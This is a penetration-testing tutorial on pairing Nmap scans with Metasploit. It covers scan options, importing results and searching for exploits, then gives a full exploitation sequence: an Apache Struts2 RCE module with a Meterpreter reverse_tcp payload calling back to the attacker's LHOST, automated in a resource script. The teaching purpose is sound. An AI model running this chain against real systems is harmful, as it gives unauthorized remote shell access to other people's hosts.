Using Nmap with Metasploit

Learn how to use Nmap with Metasploit for penetration testing and vulnerability exploitation.
by İbrahim Korucuoğlu ( @siberoloji) |
Tags:
Categories:

  4 minute read  

Introduction

Nmap (Network Mapper) and Metasploit are two of the most powerful tools in cybersecurity, widely used by penetration testers, ethical hackers, and security professionals. Nmap is primarily a network discovery and vulnerability scanning tool, while Metasploit is an exploitation framework that allows users to test and validate vulnerabilities. Integrating Nmap with Metasploit enhances penetration testing workflows by automating target discovery, vulnerability scanning, and exploitation.

In this article, we will explore how to use Nmap with Metasploit effectively, covering installation, scanning, importing results, and leveraging discovered vulnerabilities for exploitation.

Prerequisites

Before we dive into using Nmap with Metasploit, ensure you have the following installed on your system:

  • Kali Linux (recommended) or another penetration testing distribution
  • Nmap (pre-installed in Kali Linux or install with sudo apt install nmap)
  • Metasploit Framework (MSF) (pre-installed in Kali Linux or install with sudo apt install metasploit-framework)

Step 1: Performing Network Scanning with Nmap

Before launching an attack, it is crucial to gather information about the target network. Nmap provides various scan types that help in this process.

Basic Nmap Scan

To perform a basic scan on a target IP address:

nmap <target-IP>

This will return basic information about the open ports and services running on the target machine.

Aggressive Scan

For a more detailed scan, use the -A flag:

nmap -A <target-IP>

This scan provides additional details, including OS detection, version detection, and script scanning.

Scanning Specific Ports

To scan specific ports, use the -p flag:

nmap -p 22,80,443 <target-IP>

This command scans only ports 22 (SSH), 80 (HTTP), and 443 (HTTPS).

Scanning a Range of IPs

For scanning a subnet or range of IPs:

nmap 192.168.1.0/24

This scans all devices within the 192.168.1.x network.

Saving Scan Results

To save scan results for further analysis:

nmap -oX scan_results.xml <target-IP>

This command exports results in XML format, which can be imported into Metasploit.

Step 2: Importing Nmap Scan Results into Metasploit

Once you have performed an Nmap scan, importing the results into Metasploit allows for further analysis and exploitation.

Starting Metasploit

Launch Metasploit by running:

msfconsole

Once inside the Metasploit console, use the following command to import the scan results:

db_import scan_results.xml

To verify that the results were imported, list the available hosts:

hosts

This will display all detected devices and open ports.

Step 3: Analyzing Imported Data

Metasploit provides built-in database commands to analyze imported Nmap data effectively.

Viewing Services

To list all discovered services on the scanned hosts:

services

This helps identify potential attack vectors based on running services.

Searching for Vulnerabilities

To search for available exploits for a specific service, use:

search <service-name>

For example, if Apache HTTP is detected:

search apache

Metasploit will list all available exploits related to Apache.

Step 4: Exploiting Discovered Vulnerabilities

Once you have identified a vulnerable service, the next step is to select and use an exploit.

Selecting an Exploit

Use the following command to choose an exploit:

use exploit/multi/http/apache_struts2_rce

Replace apache_struts2_rce with the actual exploit module you want to use.

Setting Target and Payload

Specify the target IP:

set RHOSTS <target-IP>

Set the payload:

set PAYLOAD windows/meterpreter/reverse_tcp

Set the listening host (your attacking machine):

set LHOST <your-IP>

Executing the Exploit

Once everything is configured, run the exploit:

exploit

If successful, this will grant you access to the target machine.

Automating Nmap and Metasploit with Resource Scripts

To streamline scanning and exploitation, you can create a resource script to automate the process.

Creating a Resource Script

Open a text editor and create a script, e.g., scan_exploit.rc:

spool output.log
db_nmap -A -p 22,80,443 <target-IP>
hosts
services
search apache
use exploit/multi/http/apache_struts2_rce
set RHOSTS <target-IP>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <your-IP>
exploit

Save and run the script in Metasploit:

msfconsole -r scan_exploit.rc

This will execute all commands sequentially, saving time and effort.

Conclusion

Using Nmap with Metasploit is an essential technique for penetration testers and ethical hackers. Nmap helps identify vulnerabilities, and Metasploit enables testing and exploitation of those vulnerabilities efficiently. By integrating the two, you can automate reconnaissance, analyze network data, and exploit vulnerabilities with precision.

Mastering these tools will significantly enhance your penetration testing skills and improve your cybersecurity expertise. However, always ensure ethical and legal usage by obtaining proper authorization before performing security assessments.


< Automating Vulnerability Scanning with NmapImporting Nmap Results into Nessus >